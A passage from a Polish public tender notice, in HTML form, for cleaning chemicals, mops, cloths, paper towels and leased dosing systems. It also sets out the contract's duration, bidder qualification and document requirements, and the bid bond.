nieprzyjemnych zapachów,4)	odpowiedni do zastosowania do kratek kanalizacyjnych, śmietników, koszy na odpady oraz płytek ceramicznych, muszli i pisuarów,5)	pH koncentratu 9,5 - 10,56)	opakowanie 5l. lub porównywalne15. Silnie skoncentrowany preparat do usuwania osadów po kawie i herbacie - 16600 l roztworu roboczego 1)	płynny preparat do namaczania naczyń kuchennych.2)	posiada zdolność usuwania osadów po kawie, herbacie i napojach owocowych3)	Dozowanie 0,6% - 1,6%. 4)	Czas działania 15 - 30 minut5)	Zawiera kompozycję alkaliów, chloru i związków powierzchniowo czynnych6)	Opakowanie 5l16.	Środek myjąco - czyszczący do powierzchni kuchennych - 3500 litrów roztworu roboczego -1)	stężony, alkaliczny preparat intensywnie rozpuszczający tłuszcze roślinne i zwierzęce oraz inne zabrudzenia występujące w miejscach przygotowywania posiłków odpowiedni do utrzymania czystości w miejscach ekstremalnie zatłuszczonych.2)	bezpieczny dla czyszczonych powierzchni w tym powierzchni z aluminium,3)	preparat lekko perfumowany posiadający technologię neutralizacji nieprzyjemnych zapachów4)	przeznaczony do utrzymania higieny w kuchniach przemysłowych5)	pH preparat 12,5 - 13,56)	dozowanie 2 % - automatyczne7)	opakowanie 5L lub porównywalne17.	Preparat do rozpuszczania osadów mineralnych z kotłów oraz urządzeń kuchennych - 60 litrów Kwasowy preparat do usuwania kamienia w zmywarkach do naczyń i szkła1)	Temperatura działania ok. 60?-80 C, czas działania 20-30 min.2)	pH preparatu 0,5 - 1,23)	opakowanie max. 2 L z dołączoną lancą podającą preparat w postaci piany18.	Płyn do czyszczenia silnie zatłuszczonych i przypalonych powierzchni - 50 litrów 1)	postać: płyn2)	czas działania 10- 30 min.3)	temperatura czyszczonej powierzchni 60 - 80?C4)	przeznaczony do usuwania tłuszczu i przypalonych resztek żywności5)	pH preparatu 12 - 136)	Opakowanie max - 2L. z dołączoną lancą podającą preparat w postaci piany19. Środek do dezynfekcji powierzchni. - 5 000 litrów roztworu roboczego 1)	preparat myjąco-dezynfekcyjny, przeznaczony do mycia i dezynfekcji powierzchni i urządzeń w miejscach przygotowywania i spożywania posiłków2)	pH preparatu 10,5 - 11,03)	czas działania max 15 minut4)	posiada szerokie spektrum skuteczności mikrobiologicznej, skuteczny przeciwko bakteriom, grzybom drożdżopodobnym i pleśniom w temperaturze 20 stopni Celsjusza,5)	zawiera w swoim składzie czwartorzędowe związki amoniowe, benzyl-C12-16-alkildimetyl, chlorki 3-10%, niejonowe środki powierzchniowoczynne(alkohol(C13) etoksylowany (8-9EO)) 3-10%, węglan di sodu 1-3%6)	stężenie robocze 1 - 3% (dozowanie automatyczne)7)	opakowanie 5l. lub porównywalne, 20.	Płynny detergent do mycia naczyń w zmywarkach przemysłowych - 1 500 litrów Wymagania:1)	stan skupienia : płyn nie zawierający chloru posiadający w swoim składzie alkalia zapewniające usuwanie zabrudzeń tłuszczowych, związki kompleksujące oraz inhibitory korozji przeciwdziałające osadzaniu się kamienia na powierzchniach2)	nie pozostawiający smug i zacieków, odpowiedni do zastosowania przy wysokiej twardości wody3)	posiadający w składzie wodorotlenek sodu 10-20%, nitrylotrioctan tri sodu 3-10%, sól czterosodową kwasu 1-hydroksyetylidenodwufosfonowego 1-3%4)	dozowanie 1,5 - 3 g/L (automatyczne)5)	pH 12,0 - 13,06)	opakowanie 20L 21 . Środek nabłyszczający do płukania naczyń w zmywarkach - 650 litrów Wymagania :1)	kwaśny preparat do płukania i nabłyszczania naczyń zawierający mieszaninę nisko pieniących środków powierzchniowo czynnych zapewniających krótki czas schnięcia naczyń oraz pozostawiających powierzchnię bez smug2)	przeznaczony do stosowania do twardej wody3)	dozowanie 0,2- 0,5 ml na 1L wody4)	pH preparatu ok. 1,65)	gęstość w 20 stopniach Celsjusza ok. 1,04 g/m26)	opakowanie 5 L 22. Preparat do gruntownego czyszczenia muszli i pisuarów - 160 litrów1)	posiadający zdolność usuwania kamienia i innych zanieczyszczeń z muszli klozetowych i pisuarów2)	preparat w postaci żelu, gotowy do użycia3)	pH preparatu 0,5 - 1,04)	opakowanie 0,75 L23.	Preparat do odtłuszczania i odkamieniania kuchni - 10 000 litrów roztworu roboczego 1)	płynny preparat do jednoczesnego usuwania osadów wapiennych oraz tłuszczy roślinnych i zwierzęcych2)	przeznaczony do stosowania w kuchniach i przemyśle spożywczym3)	stężenie robocze 1 -2 %4)	dozowanie automatyczne5)	pH preparatu 0,5 - 1,56)	opakowanie max 10L24. Preparat do gruntownego czyszczenia płytek gresowych - 60 litrów1)	płynny alkaiczny preparat do gruntownego czyszczenia podłóg mikroporowatych odpowiedni do czyszczenia ręcznego i maszynowego2)	dozowanie 2,5 - 5%3)	posiadający zdolność usuwania starych uporczywych zabrudzeń4)	odpowiedni do zastosowania w miejscach przygotowywania i przechowywania żywności5)	pH preparatu 12-136)	opakowanie 5L25.	Wkład zapachowy pasujący do automatycznego dozownika odświeżacza powietrza - 24 szt.1) pojemność 270 ml2)	pasujący do automatycznego dozownika powietrza Time Mist3)	zapach zielone jabłuszko, świeża pościel, cytrusowy, rubin4)	wydajność wkładu min 30 dni26. Ręczniki papierowe białe, dwuwarstwowe w roli, wykonane w technologii TAED (dwie warstwy zgrzewane ciepłym powietrzem) - szt. 3000 Parametry:1)	gramatura 2 x 20,5 g/m22)	długość 120m, szerokość 21 cm średnica rolki 19 cm3)	wykonany z 2 warstwowej celulozy4)	nasycenie bieli 86%5)	każda rolka powinna być zabezpieczona banderolą , zabezpieczającą przed zabrudzeniem produktu6)	po jednej stronie rolki powinien się znajdować się plastikowy uchwyt będący integralną częścią każdej rolki ręcznika7)	każda rolka powinna posiadać banderolę z instrukcją obsługi wkładu27. Ściereczka do sprzątania z mikrofazy w kolorach (niebieski, czerwony, żółty, zielony) - szt.20001)	rozmiar 35 x 40 cm2)	temperatura prania 95 stopni, suszenia 60 stopni3)	gramatura 270 g/m24)	wykonana z mieszaniny poliamidu (ok. 20%) z poliestrem (ok. 80%)5)	pętelki ściereczki zamknięte6)	ściereczka zgodna z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) nr 1007/2011 z dn. 27 września 2011 roku w sprawie nazewnictwa włókien tekstylnych i oznakowania składu surowców wyrobów włókienniczych28. Nakładka mopa bawełniana 40 cm kieszeniowa z taśmą mocującą szt. 16001)	mop kieszeniowy płaski z taśmą do bezdotykowej obsługi przystosowany do uchwytu o długości 40 cm2)	część robocza mopa wykonana z bawełny (47%) i poliestru (53%)3)	podkład mopa wykonany z bawełny (35%) i poliestru (65%)4)	waga mopa 145g5)	ścieralność max 3,5%6) temperatura prania 95stopni C7)	temperatura suszenia 110 stopni C8)	wewnątrz mopa pętelki na obrzeżach frędzle, długość frędzli 35 mm, wysokość pętelek 20 mm (+- 5 mm)9)	mop tkany, ilość ściegów tkania min. 14, rodzaj tkania wewnętrznych rzędów pętelek zapewniający brak możliwości wyciągnięcia nitki z tkaniny10)	oznaczenie mopa kolorową lamówką wszytą na całej długości mopa (kolory lamówki czerwony i zielony) - do oznaczenia stref czystości11)	wymiary wewnętrzne kieszeni mopa: głębokość 65 mm, szerokość 120 mm12)	zewnętrzna tasiemka zakończona zaszewką umożliwiającą montaż mopa na uchwycie, umożliwiająca bezdotykowe płukanie mopa13)	mop powinien posiadać trwale nadrukowane oznaczenie z datą produkcji, przepisem prania, nazwie producenta oraz rozmiarze14)	mop powinien być zgodny z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) nr 1007/2011 z dnia 27.09. 2011r w sprawie nazewnictwa włókien tekstylnych i oznaczenia składu surowców wyrobów włókienniczych15)	gwarancja wytrzymałości min. 250 cykli prania*16)	mop powinien posiadać możliwość sterylizacji w temperaturze 120 stopni C przez 15 minut17)	nakładka mopa powinna pasować do uchwytu mopa z pozycji 30dołączyć dokument producenta potwierdzający gwarancję ilości cykli prania29.	Pad do maszyny jednotarczowej średnica 43 cm (niebieski, czarny) - szt. 1030. Uchwyt mopa 40x10cm - szt.401)	długość 40 cm, szerokość 10 cm, waga 350g (+- 10g)2)	podstawa uchwytu wykonana z polipropylenu z kolorze antracyntowym, perforowany, , mocowany do kija za pomocą śruby, posiadający trwale naniesioną nazwę producenta oraz datę produkcji3)	elementy mocowania, sworznie i śruby wykonane ze stali szlachetnej4)	przycisk nożny oznaczony kolorem zielonym i czerwonym (według przynależności do stref sanitarnych) umożliwiający otwieranie i zamykanie uchwytu bez pomocy rąk5)	możliwość wymiany takich elementów uchwytu jak przegub i przycisk nożny6)	możliwość dezynfekcji chemicznej i termicznej do 110 st. C.?	31. Kij aluminiowy do mopa - 35 szt.1)	wykonany z elaksowanego aluminium, długość uchwytu/rękojeści 16 cm w kolorze szarym2)	długość 1400 mm, średnica 23,5 mm3)	waga 275 g (+- 10g)4)	średnica otworu na śrubę 6,5 mm5)	pasujący do uchwytu z poz. 3032.	Butelka z rozpylaczem do nanoszenia roztworów roboczych o pojemności 0,5L szt. 70 , kolor niebieski1)	rozpylacz podający preparat w postaci mgiełki2)	butelka wyprofilowana ułatwiająca pewny uchwyt dłoni, posiadająca podziałkę z oznaczeniem pojemności3)	butelka powinna posiadać niezmywalny piktogram wskazujący na przeznaczenie produktu oraz zawierać nazwę preparatu zaproponowanego w pozycji 1 - 333.	Butelka z rozpylaczem do nanoszenia roztworów roboczych o pojemności 0,5L szt 40. kolor czerwony1)	rozpylacz podający preparat w postaci pianki2)	butelka wyprofilowana ułatwiająca pewny uchwyt dłoni, posiadająca podziałkę z oznaczeniem pojemności3)	butelka powinna posiadać niezmywalny piktogram wskazujący na przeznaczenie produktu oraz zawierać nazwę preparatu zaproponowanego w pozycji 7 - 9Wymagania odnośnie systemów dozujących. Oferent wydzierżawi i zamontuje Zamawiającemu na czas trwania umowy następujące dozowniki i systemy dozujące.1.	Pompa do produktów z poz 2, 5, 8Przepływowa pompa, automatycznie dozująca gotowy roztwór roboczy z koncentratu poprzez podłączenie do ujęcia wody i kanistra z koncentratem. Pompa powinna charakteryzować się prostym montażem i trwałością oraz powinna być przeznaczona do jednego produktu tzn. jedna pompa do dozowania jednego produktu , możliwe powinno być jednak łączenie pomp w sekcje za pomocą złączki z tworzywa sztucznego przy czym każdy produkt powinien posiadać osobny wąż do nalewania produktu do wiadra co przeciwdziała mieszaniu się produktów podczas nalewania roztworu. Plastikowa obudowa zapewniająca bezpieczne i bezawaryjne użytkowanie. Pompa musi mieć możliwość regulacji stężenia za pomocą specjalnych dysz. Pompa powinna posiadać regulację sposobu jej uruchamiania tzn. możliwość rozpoczęcia dozowania na zasadzie włącz/wyłącz oraz możliwość dozowania podczas przytrzymania przycisku lub pokrywy pompy w zależności od preferencji użytkowników i miejsca montażu. Rozmiary jednej pompy nie większe niż: wysokość: 220 mm, szerokość: 120 mm, głębokość: 110 mm z uwagi na miejsca przeznaczone na montaż. Waga 1 - 1,2 kg.Ilość 48 szt. pojedynczych pomp z możliwością połączenia w sekcje po 3 sztuki.2.	Stacja dozująca do produktów z poz. 3, 6 , 9Wykonawca wydzierżawi wraz z zainstalowaniem i naprawą na czas trwania umowy kompletne automatyczne systemy dozujące podające gotowe roztwory robocze w odpowiednim stężeniu. System dozujący powinien posiadać możliwość dopasowania optymalnego przepływu wody, niskiego do napełniania butelek z rozpylaczem i wysokiego do wiader.Urządzenie powinno posiadać wąż napełniający wiadra zakończony pistoletem dozującym z blokadą przelewu umożliwiającym ciągłe dozowanie bez konieczności ciągłego wciskania spustu, stację napełniającą butelki oraz pokrętło wyboru produktu, w tym z funkcją przepływu wody w celu przepłukania wężyków.System dozujący powinien mieć postać szafki o wymiarach około 62 x 47 x 19 cm z zamykanymi na klucz stalowymi drzwiami malowanymi proszkowo z przezroczystymi okienkami umożliwiającymi obserwację zużycia środków bez otwierania szafki. Szafka powinna uniemożliwiać dostęp do koncentratu osobom niepowołanym, mieszcząca 4 saszetki koncentratu w przedziale pojemności 2,5 -3 litry zaproponowane w pozycji 3, 6, 9W celu zapewnienia lepszej kompatybilności stacja dozująca powinna pochodzić od tego samego producenta co zaoferowane w pozycjach 3, 6, 9 środki chemiczne - szt.103.	Pompa do płynu myjącego z poz. 20Pompa do zmywarki pozwalająca na precyzyjne dozowanie detergentu. Powinna posiadać regulację czasu dozowania oraz szybkości dozowania detergentu oraz funkcję wymuszonego szybkiego dozowania potrzebną do odpowietrzenia układu dozowania podczas wymiany kanistra z detergentem. Pompa o zasilaniu elektrycznym. szt.3 4.	Pompa do płynu nabłyszczającego z poz. 21Pompa do zmywarki pozwalająca na precyzyjne dozowanie płynu nabłyszczającego. Powinna posiadać regulację czasu dozowania i szybkości dozowania oraz funkcję wymuszonego szybkiego dozowania potrzebną do odpowietrzenia układu dozowania podczas wymiany kanistra . Pompa o zasilaniu elektrycznym. szt.15.	Dozowniki do mycia z wężem 15mb (kuchnia , Garaże) - 2 sztNiskociśnieniowe urządzenie mycia i dezynfekcji powierzchni wyposażone w wąż zakończony pistoletem posiadającym możliwość mycia pianowego, długość węża min. 15 mb. Pozwalająca na jednoczesne podłączenie produktu do mycia oraz produktu do dezynfekcji powierzchni. Stacja do dozowania produktów powinna posiadać możliwość podpięcia do wody i automatycznie rozcieńczać koncentrat do wymaganego stężenia roboczego. Konstrukcja powinna zapewniać możliwość mycia, dezynfekcji oraz płukania powierzchni wodą za pomocą dołączonego węża z pistoletem oraz posiadać zawór zabezpieczający przed zaciągnięciem chemii do instalacji budynku w przypadku spuszczenia wody z sieci.6.	Dozowniki do ręczników w roli z pozycji 26 Oferent wydzierżawi na czas trwania umowy - szt. 15Naścienny dozownik do ręczników papierowych. Dozownik o wymiarach: 37,2 x 33,7 x 20,3cm; wykonany z tworzywa ABS (część biała) i MABS (część szara - umożliwiająca kontrolę ilości wkładu). Dozownik systemu H1, dozuje po jednym odcinku ręcznika o długości 25cm. Dozownik zamykany jest na metalowy kluczyk oraz metalowy zamek i posiada dwie opcje otwierania: przez kluczyk bądź przez przycisk wbudowany w metalowy zamek. Dozownik zawiera poziomicę umiejscowioną na tylnej ścianie umożliwiającą łatwy montaż oraz zestaw montażowy w skład którego wchodzą: 4 śruby (długość śruby 4 cm) i 4 koszulki rozporowe (dopasowane do wiertła o średnicy 6mm). Na tylnej ściance znajdują się 4 otwory montażowe.Wszystkie produkty winne posiadać etykiety (instrukcje użytkownika) w języku polskim.Oferent ma obowiązek przeprowadzić szkolenie personelu</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39830000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39800000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39813000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39820000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39831210-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39831220-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39831300-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33763000-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">24</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>24</TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie postawił żadnego warunku w zakresie niniejszego punktu</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie postawił żadnego warunku w zakresie niniejszego punktu</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. (Wykonawca musi wykazać się co najmniej jedną dostawą odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot zamówienia o wartości 230 000 zł brutto) - Załącznik nr 5 do SIWZ.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">a)	katalogi, ulotki aplikacyjne w języku polskim oraz karty charakterystyki ((dotyczy tylko wyrobów niebezpiecznych)) opisujące szczegółowo właściwości oferowanych produktów, opis ich stosowania, przeznaczenie, skład, wydajność, parametry techniczne itd. - potwierdzające wymagania określone w ,,Opisie przedmiotu zamówienia" -- Zamawiający dopuszcza by karty katalogowe, opisy, karty charakterystyki były na płycie CD.b)	ulotki dotyczące systemów dozujących zawierające zdjęcia produktów pozwalające na określenie zgodności zaproponowanych systemów dozujących z wymogami Zamawiającegoc)	dokument potwierdzający skuteczność mikrobiologiczną preparatu w pozycji 19 w przyjętym stężeniu roboczym wobec wymaganego spectrum działania preparatu w temperaturze max. 20 stopni i czasie max 15 minutd)	Do poz. 29 - Nakładka mopa bawełniana - należy dostarczyć dokument producenta potwierdzający gwarancję ilości cykli prania.e)	Próbki proponowanego preparatu z poz. 3,6,9 w celu weryfikacji zgodności z SIWZ</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1) Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty, sporządzony według wzoru stanowiącego załącznik nr 2 do SIWZ 2) Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz cenowy, sporządzony według wzoru stanowiącego załącznik nr 3 do SIWZ . 3) Oświadczenie wymienione w punkcie 4.1. SIWZ. 4) Potwierdzenie wniesienia wadium - kserokopia wniesionego wadium wpięta do oferty w kolejności. Wadium wniesione w formie innej niż w pieniądzu należy złożyć w ofercie, w taki sposób, by można było zrealizować dyspozycję zawartą w art. 46 ustawy Pzp dot. zwrotu wadium 5) Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie poświadczonej kopii.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Kwotę wadium dla całości zamówienia zamawiający ustala w wysokości 6 000,00 PLN (słownie: sześć tysięcy zł 00/100).</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Tak</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> 